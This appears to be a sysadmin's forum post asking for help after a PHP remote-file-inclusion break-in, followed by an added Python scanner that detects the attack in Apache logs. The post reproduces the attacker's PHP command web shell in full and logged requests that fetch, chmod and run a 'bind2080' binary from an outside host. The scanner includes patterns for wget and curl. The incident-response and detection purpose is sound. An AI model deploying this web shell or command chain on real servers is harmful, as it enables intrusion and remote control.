Hack attempt
Hi all.
This is my first post here. I'm Norbert Crettol, one of the sysadmins
of Idiap, a research center in Switzerland (www.idiap.ch).
We've had an undesired visitor last night, which I discovered in the
reports of tripwire.
Here are the logs we got (we get a remote copy of the web server logs
on another host). From the second line on, I've stripped the head and
the tail of the line, which is always the same.
--- begin ---
"GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080
bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080
--- end ---
I've seen no other
It looks like bind8080 has created a directory /var/lock/.tmp
and expanded an archive (owned by the web server owner) there. Here
is the list of the files:
3225 jui 20 03:53 c-leet
15 jui 20 03:47 c-leet.dir
51 jui 20 03:47 cron.d
512 mai 12 2002 doc/
14 jui 21 16:27 eggdrop -> eggdrop-1.6.10*
2523568 mai 12 2002 eggdrop-1.6.10*
512 mai 12 2002 filesys/
343 fév 11 03:55 fuck*
512 mai 12 2002 help/
21149 nov 4 2003 kik*
1024 jui 21 11:00 language/
512 mai 12 2002 logs/
6 jui 20 03:48 pid.CaEm-
23065 jan 29 15:00 proc*
6 jui 20 03:48 psybnc.pid
28591 mai 12 2002 README
89 jui 20 03:53 run*
588 avr 1 10:00 run-*
708 avr 1 10:00 run--*
512 mar 31 08:12 scripts/
512 mai 12 2002 text/
2523568 mar 28 01:41 vi*
30293 nov 17 2002 xhide*
182 jui 20 03:47 y2kupdate*
Here is the content of http://www.bosscalvin.com/inject.txt:
--- begin ---
<font color="red">
<br><font face="Comic Sans MS" size="2"><center>
<b>CMD</b> - System Command<br><br></center></font><font face="Verdana" size="1"></center><br>
<b>#</b> CMD PHP : <br>
<b>#</b> Released by : <b>SecurityCorp</b><br>
<b>#</b> Edited by CaEm
<br>
<br>
<hr color="red" width=751px height=115px>
<br>
<pre><font face="Verdana" size="1">
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
// $chdir and $cmd come straight from the query string (register_globals);
// the vulnerable script's include() fetches this file over HTTP and runs it
// with the privileges of the web server user.
if (isset($chdir)) @chdir($chdir);
ob_start();
// Run the command, capture stdout and stderr through a temp file, then delete it.
system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
$output = ob_get_contents();
ob_end_clean();
// HTML-escape < and > so the command output is shown literally inside the <pre>.
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</font></pre>
<br>
<hr color="red" width=751px height=115px>
<br>
<font face="Comic Sans MS" size="1"><b>« CaEm » </b><br><b>@ </b><b> îrç.Ðå£.ñët <i>#Renjana</i></b><br>
--- end ---
Has someone seen this kind of attack? (chkrootkit doesn't detect it.)
Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org)?
Is there a way to stop this guy? His nickname (CaEm) appears in the
uploaded scripts.
Norbert
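Added example, not part of Norbert's post or of any Idiap tooling: a small log scanner that finds the remote-file-inclusion pattern shown above (a query parameter whose value is a URL, plus a cmd= parameter) in Apache combined-format access logs, decodes the commands, and flags the download / chmod / execute chain that dropped bind2080. The log lines embedded below are constructed to mirror the requests in the post; the client IP, script name, timestamps and byte counts are assumptions. The remote-include check also covers php:// and data: stream wrappers, which include() treats the same way as http://.

```python
"""Detect PHP remote-file-inclusion (RFI) probes in Apache combined-format
access logs and reconstruct the command sequence the attacker ran.

Editor's example, not code from the original post. SAMPLE_LOG is constructed
to mirror the post's requests; IP, script path, timestamps and sizes are
assumed values.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log lines modelled on the post (assumed IP/path/dates).
SAMPLE_LOG = """\
10.0.0.1 - - [20/Jul/2004:03:45:01 +0200] "GET /index.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.1 - - [20/Jul/2004:03:45:09 +0200] "GET /index.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a HTTP/1.0" 200 6700 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.1 - - [20/Jul/2004:03:45:20 +0200] "GET /index.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget HTTP/1.0" 200 6650 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.1 - - [20/Jul/2004:03:45:31 +0200] "GET /index.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a HTTP/1.0" 200 7100 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.1 - - [20/Jul/2004:03:45:44 +0200] "GET /index.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la HTTP/1.0" 200 7300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.1 - - [20/Jul/2004:03:46:02 +0200] "GET /index.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la HTTP/1.0" 200 6800 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.1 - - [20/Jul/2004:03:46:40 +0200] "GET /index.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080 HTTP/1.0" 200 6900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.1 - - [20/Jul/2004:03:46:55 +0200] "GET /index.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080 HTTP/1.0" 200 6600 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
10.0.0.1 - - [20/Jul/2004:03:47:10 +0200] "GET /index.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080 HTTP/1.0" 200 6600 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
"""

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Parameter values that make include()/require() load code from outside the
# document tree: remote URLs and the php:// / data: stream wrappers.
REMOTE_INCLUDE_RE = re.compile(r'^(?:https?|ftp)://|^php://|^data:', re.IGNORECASE)

# Tokens that turn a one-off command foothold into a dropped implant.
STAGE_PATTERNS = {
    "download": re.compile(r'\b(?:wget|curl|fetch|lynx)\b'),
    "chmod": re.compile(r'\bchmod\b'),
    "execute": re.compile(r'(?:^|[;&|]\s*)\./\S+'),
}


def parse_query(query):
    """Split a raw query string on '&' only (a literal ';' inside a value such
    as 'cd /var/;ls' must survive) and percent-decode keys and values."""
    pairs = []
    for part in query.split('&'):
        if not part:
            continue
        key, _, value = part.partition('=')
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def scan_log(text):
    """Return one finding per request whose query carries a remote include;
    'command' holds the decoded cmd= value when one was passed."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        target = urlsplit(m['target'])
        params = parse_query(target.query)
        remote = [(k, v) for k, v in params if REMOTE_INCLUDE_RE.match(v)]
        if not remote:
            continue
        cmds = [v for k, v in params if k == 'cmd']
        findings.append({
            'ip': m['ip'],
            'timestamp': m['ts'],
            'script': target.path,
            'include_param': remote[0][0],
            'include_url': remote[0][1],
            'host': urlsplit(remote[0][1]).hostname,
            'command': cmds[0] if cmds else None,
            'status': int(m['status']),
        })
    return findings


def reconstruct_sessions(findings):
    """Group findings by (client, injected URL), keep the commands in order and
    flag sessions that downloaded, chmod'ed and executed a file."""
    sessions = {}
    for f in findings:
        s = sessions.setdefault((f['ip'], f['include_url']),
                                {'commands': [], 'stages': set()})
        if f['command'] is None:
            continue
        s['commands'].append(f['command'])
        for stage, pat in STAGE_PATTERNS.items():
            if pat.search(f['command']):
                s['stages'].add(stage)
    for s in sessions.values():
        s['implant_dropped'] = {'download', 'chmod', 'execute'} <= s['stages']
    return sessions


if __name__ == '__main__':
    for (ip, url), s in reconstruct_sessions(scan_log(SAMPLE_LOG)).items():
        print(f"{ip} included {url} -> implant dropped: {s['implant_dropped']}")
        for c in s['commands']:
            print("   ", c)
```

Run it against a real access log by feeding the file contents to scan_log(); the script name, the injected host and the decoded commands are exactly what you want to hand to whoever owns the box, and a session with implant_dropped set is the one to reimage rather than clean.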